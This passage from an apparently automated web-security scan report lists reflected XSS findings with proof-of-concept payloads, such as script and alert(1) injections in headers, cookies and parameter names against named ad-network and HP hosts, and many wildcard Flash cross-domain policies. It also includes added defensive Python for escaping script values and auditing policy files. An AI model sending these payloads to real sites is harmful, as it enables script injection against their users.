This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash offered ways to make another user's browser send a request containing an arbitrary HTTP header, and where such a technique is available it can probably be used to exploit this XSS flaw. For the Referer header specifically, an attacker can also influence the value by linking to the vulnerable page from a page whose own URL contains the payload, subject to the browser percent-encoding characters such as quotes in the URL it sends, and to the referrer policy (current browsers default to strict-origin-when-cross-origin, which sends only the origin on cross-site navigations). This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=755C60E8161379FBEEA117E61515830A; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close
The value of the sapha_2522_1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89c4'%3balert(1)//76f56e1d866 was submitted in the sapha_2522_1 cookie. This input was echoed as e89c4';alert(1)//76f56e1d866 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3 was submitted in the server cookie. This input was echoed as b2bbe\" style=x:expression(alert(1)) 0e696d288b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are not supported from IE8 standards mode onwards), and may not work on other browsers. The backslash in front of the echoed quotation mark shows that the application applies JavaScript-string escaping to the cookie value; a backslash has no meaning inside an HTML attribute, so the quotation mark still terminates the attribute value and the injected style attribute is parsed as markup.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a was submitted in the server cookie. This input was echoed as 6b5d7\" style=x:expression(alert(1)) 8dda330855a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
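The script-context findings above (lhnid, t and zimg on www.livehelpnow.net, the n parameter in the lijit snippet, and the User-Agent, Referer and cookie values reflected into JavaScript strings) share one root cause: the template supplies the quotes, or no quotes at all, and the user supplies the contents. The Python below is an added example for this page, not code from any of the scanned sites; the variable names echo the snippets in the report, while the helper names, the sample inputs and the JSON data-island alternative are assumptions. It shows why quoted and unquoted slots need different treatment (escaping for one, validation for the other), and includes a small string-literal-aware scanner used only to demonstrate the difference between the two renderings.

```python
"""Added example: emitting user-supplied values into an inline <script>.

Not code from any scanned site. Helper names, sample inputs and the JSON
data-island variant are assumptions; the payload shapes follow the report.
"""
import json
import re

# Constructed inputs shaped like the payloads in the findings above.
SINGLE_PAYLOAD = "66e04';alert(1)//c592964d139"    # ends a '...' string
QUOTED_PAYLOAD = '2c53a";alert(1)//9f46c8341f8'    # ends a "..." string
DASH_PAYLOAD = 'de78d"-alert(1)-"b6aa71aa6bb'       # no ';' needed at all
UNQUOTED_PAYLOAD = "5955a0d;alert(1)//87929036ab1"  # numeric slot, no quotes


def _escape_angle(text: str) -> str:
    # Written as \u00XX escapes so JSON/JS text can never contain "</script>"
    # or "<!--" and end the enclosing script block early.
    return text.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def js_string_literal(value: str) -> str:
    """Return a complete JavaScript string literal, quotes included."""
    # json.dumps backslash-escapes '"' and '\\' and, with the default
    # ensure_ascii=True, writes U+2028/U+2029 (which terminate a JS string)
    # as \u2028 / \u2029 instead of emitting the raw characters.
    return _escape_angle(json.dumps(value))


def is_safe_integer(value: str) -> bool:
    """An unquoted slot cannot be escaped, only validated: plain integers only."""
    return re.fullmatch(r"-?[0-9]{1,10}", value) is not None


def js_integer_literal(value: str) -> str:
    """Normalise through int() so e.g. '0059' cannot become a legacy octal literal."""
    if not is_safe_integer(value):
        raise ValueError(f"refusing non-integer value {value!r}")
    return str(int(value))


def render_script_vulnerable(track: str, lhnid: str, zimg: str) -> str:
    """The pattern in the findings: the template owns the quotes (or has none)
    and the user value is pasted inside, so a quote or ';' rewrites the program."""
    return (f"var lhnTrack='{track}';\n"
            f'var lhnId="{lhnid}";\n'
            f"var zimg={zimg};\n")


def render_script_hardened(track: str, lhnid: str, zimg: str) -> str:
    """Each slot receives a whole literal from the helpers; the template adds
    no quotes of its own around user data."""
    return (f"var lhnTrack={js_string_literal(track)};\n"
            f"var lhnId={js_string_literal(lhnid)};\n"
            f"var zimg={js_integer_literal(zimg)};\n")


def render_json_island(settings: dict) -> str:
    """Preferred shape: keep user data out of executable script entirely and
    read it client-side with JSON.parse(document.getElementById(id).textContent)."""
    body = _escape_angle(json.dumps(settings))
    return f'<script type="application/json" id="lhn-settings">{body}</script>'


def code_outside_strings(js: str) -> str:
    """Demo helper: drop the contents of JS string literals (honouring backslash
    escapes) and return what is left, i.e. what the engine would run as code."""
    out, quote, i = [], None, 0
    while i < len(js):
        ch = js[i]
        if quote:                      # inside a literal
            if ch == "\\":
                i += 2                 # skip the escaped character
                continue
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def script_injected(rendered: str) -> bool:
    """True when alert( appears as code rather than inside a string literal."""
    return "alert(" in code_outside_strings(rendered)
```

The scanner is deliberately naive (no comment or regex-literal handling); it exists only to make the difference between the two renderings checkable. The real fix is the one in render_script_hardened and render_json_island: never let the template put its own quotes around user data, validate anything that must land in an unquoted position, and prefer moving data out of executable script altogether.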
3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://h30046.www3.hp.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ba3"><script>alert(1)</script>aac61ce975a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?20ba3"><script>alert(1)</script>aac61ce975a=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1">http://h30046.www3.hp.com/?20ba3"><script>alert ...[SNIP]...
3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: https://h30046.www3.hp.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa4b2<script>alert(1)</script>994bc586213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?aa4b2<script>alert(1)</script>994bc586213=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1">http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1</a> ...[SNIP]...
4. Flash cross-domain policy
There are 67 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains. Adobe ended support for Flash Player at the end of 2020, but the same policy file format is honoured by other clients (Silverlight falls back to crossdomain.xml, and Adobe Reader consults it for cross-domain access), so a stale wildcard policy is still worth removing, or restricting to the specific origins that need it. A master policy should also carry a site-control directive limiting which other policy files on the host are honoured, so that an attacker who can upload content elsewhere on the site cannot supply a more permissive policy of their own.
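As an added example (not part of this report or of any scanned host), the Python below audits a crossdomain.xml policy for the wildcard grant flagged in the instances that follow, and for two other over-broad settings the same review should catch: a subdomain wildcard combined with secure="false", and a wildcard allow-http-request-headers-from. The first sample policy is the one returned by afe.specificclick.net below; the other two are constructed, and the function names and the fetch helper are assumptions.

```python
"""Added example: a small auditor for Flash cross-domain policy files.

Not part of the report or of any scanned site. The wildcard sample is the
policy shown for afe.specificclick.net; the other two are constructed.
"""
import xml.etree.ElementTree as ET
from urllib.request import urlopen

WILDCARD_POLICY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE cross-domain-policy SYSTEM '
    '"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">'
    '<cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>'
)

# Constructed: scoped to named hosts, but still leaky in two ways.
SCOPED_BUT_LEAKY_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com"/>
  <allow-access-from domain="*.partner.example" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed: what a reviewed policy should look like.
TIGHT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com"/>
</cross-domain-policy>"""


def audit_policy(xml_text: str) -> list[str]:
    """Return one human-readable finding per risky directive (empty = clean).

    The expat parser behind ElementTree does not fetch the external DTD named
    in the DOCTYPE, so parsing a real policy stays offline.
    """
    findings: list[str] = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [f"root element is <{root.tag}>, not <cross-domain-policy>"]

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin gets two-way, cookie-bearing access')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": every host under that suffix is trusted')
        # secure defaults to true for a policy served over HTTPS; "false" lets
        # plain-HTTP content use the HTTPS site's policy.
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" for {domain}: plain-HTTP content may use this HTTPS policy')

    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            headers = rule.get("headers", "")
            findings.append(f'allow-http-request-headers-from domain="*" headers="{headers}": any origin may add request headers')
    return findings


def audit_host(host: str, timeout: float = 5.0) -> list[str]:
    """Fetch https://<host>/crossdomain.xml and audit it (needs network access;
    not exercised offline)."""
    with urlopen(f"https://{host}/crossdomain.xml", timeout=timeout) as resp:
        return audit_policy(resp.read().decode("utf-8", errors="replace"))
```

Run audit_host against each host in the instance list below to reproduce the report's findings; a clean result means every grant names a specific origin and none relaxes the HTTPS requirement.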
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: 142.xg4ken.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 05 Sep 2011 02:30:52 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 05 Sep 2011 02:30:51 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net
Response
HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: apps.sapha.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: apr.lijit.com
Response
HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:52 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n10), ms lax-agg-n10 ( origin>CONN)
ETag: "a35c9-83-4aad0437c9440"
Cache-Control: max-age=604800
Expires: Mon, 12 Sep 2011 02:30:52 GMT
Age: 0
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:49:29 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com
Response
HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 05 Sep 2011 02:30:58 GMT
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 100
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: dellinc.tt.omtrdc.net
Response
HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 16:19:15 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: eas.apm.emediate.eu
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: gacela.eu
Response
HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 13:45:59 GMT
ETag: "c1bd87-d1-4ab40884013c0"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain- ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com
Response
HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 03-Sep-2016 16:19:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" ...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com
Response
HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com
Response
HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:a1b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:23:11 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:43 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Omniture DC/2.0.0
xserver: www606
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: metrics.skype.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
xserver: www385
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: microsoftsto.112.2o7.net
Response
HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:23:13 GMT
Server: Omniture DC/2.0.0
xserver: www376
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com
Response
HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:34 GMT
Connection: keep-alive
Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: nsm.dell.com
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:16 GMT
Server: Omniture DC/2.0.0
xserver: www38
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca1 3233
Connection: keep-alive
Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: r.turn.com
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 16:19:50 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 16:19:50 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com
Response
HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:04 GMT
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com
Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Connection: keep-alive
Content-Length: 215
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com
Response
HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "38a03db-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap1den1.lijit.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: vap1iad1.lijit.com
